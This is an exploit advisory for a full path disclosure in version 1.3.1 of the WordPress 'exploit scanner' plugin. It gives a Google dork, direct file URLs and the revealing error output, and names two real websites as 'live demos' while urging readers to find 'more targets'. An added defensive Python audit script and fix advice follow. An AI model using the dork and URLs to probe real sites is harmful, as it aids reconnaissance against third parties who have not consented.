wordpress exploit scanner plugin Full Path Disclosure

2012-07-10 11:14:48
Submitted by: Crim3R

# Exploit Title: wordpress exploit scanner plugin Full Path Disclosure

# Google Dork: inurl:"/plugins/exploit-scanner/"

# Date: 07/10/2012

# Author: Crim3R

# plugin download Link : http://downloads.wordpress.org/plugin/exploit-scanner.1.3.1.zip

# Version: 1.3.1

# Tested on: all

========================================

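You can find the full path of the target by accessing the plugin file directly, or from the error_log file in the same directory. Requested outside WordPress, the file calls add_action() before WordPress is loaded, and the resulting fatal error includes the absolute path of the file.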

/wp-content/plugins/exploit-scanner/exploit-scanner.php

/wp-content/plugins/exploit-scanner/error_log

http://127.0.0.1/wordpress/wp-content/plugins/exploit-scanner/exploit-scanner.php

Fatal error: Call to undefined function add_action() in /path-on-server/wp-content/plugins/exploit-scanner/exploit-scanner.php on line 49

========================================
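
A defender-side check for the two exposures described above, as an added example (not part of the original advisory or the plugin's code): it walks a local wp-content/plugins directory and flags PHP files that call WordPress functions before any ABSPATH guard, plus log files left in the web root. The regexes are heuristics, and the function names, log-file list and sample tree are assumptions constructed for illustration.

```python
import os
import re
import tempfile

# Heuristics: guard idioms that stop direct execution, and WordPress calls that are fatal without WordPress.
GUARD = re.compile(r"defined\s*\(\s*['\"](ABSPATH|WPINC)['\"]\s*\)|function_exists\s*\(\s*['\"]add_action['\"]\s*\)")
WP_CALL = re.compile(r"\b(add_action|add_filter|register_activation_hook)\s*\(")
LOG_NAMES = {"error_log", "debug.log", "php_errors.log"}  # assumed list of common log names


def audit_plugins(plugins_dir):
    """Return sorted (relative_path, finding) tuples for a local plugins directory."""
    findings = []
    for root, _dirs, files in os.walk(plugins_dir):
        for name in files:
            path = os.path.join(root, name)
            rel = os.path.relpath(path, plugins_dir)
            if name in LOG_NAMES:
                findings.append((rel, "log file inside web root"))
            elif name.endswith(".php"):
                with open(path, encoding="utf-8", errors="replace") as fh:
                    src = fh.read()
                call = WP_CALL.search(src)
                guard = GUARD.search(src)
                # Flag files with no guard, or a guard that only appears after the first call.
                if call and (guard is None or guard.start() > call.start()):
                    findings.append((rel, "WordPress call before any ABSPATH guard"))
    return sorted(findings)


def build_sample_tree(base):
    """Constructed sample input: one unguarded plugin, one guarded plugin, one stray log."""
    samples = {
        "exploit-scanner/exploit-scanner.php": "<?php\nadd_action('admin_menu', 'demo_menu');\n",
        "exploit-scanner/error_log": "PHP Fatal error: ... in /path-on-server/...\n",
        "guarded/guarded.php": "<?php\nif (!defined('ABSPATH')) { exit; }\nadd_action('init', 'demo_init');\n",
    }
    for rel, body in samples.items():
        path = os.path.join(base, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(body)
    return base


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        for rel, finding in audit_plugins(build_sample_tree(tmp)):
            print(f"{rel}: {finding}")
```

Files it flags can be fixed by adding an ABSPATH check at the top of the PHP file and by moving logs out of the web root or denying access to them in the web server configuration.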

live demos:

http://fkstudio.free.fr/blog/wp-content/plugins/exploit-scanner/exploit-scanner.php

http://www.bienalpernambuco.com/wp-content/plugins/exploit-scanner/exploit-scanner.php

More Targets On Google :D

========================================

sites :

http://Secure-Land.net

http://IrIsT.Ir


thanks to : 2MzRp - Mikili - Amir - 0x0ptim0us - iC0d3R - farbodmahini

and all Secure-land & IrIsT Members ...

Fixes

No fixes
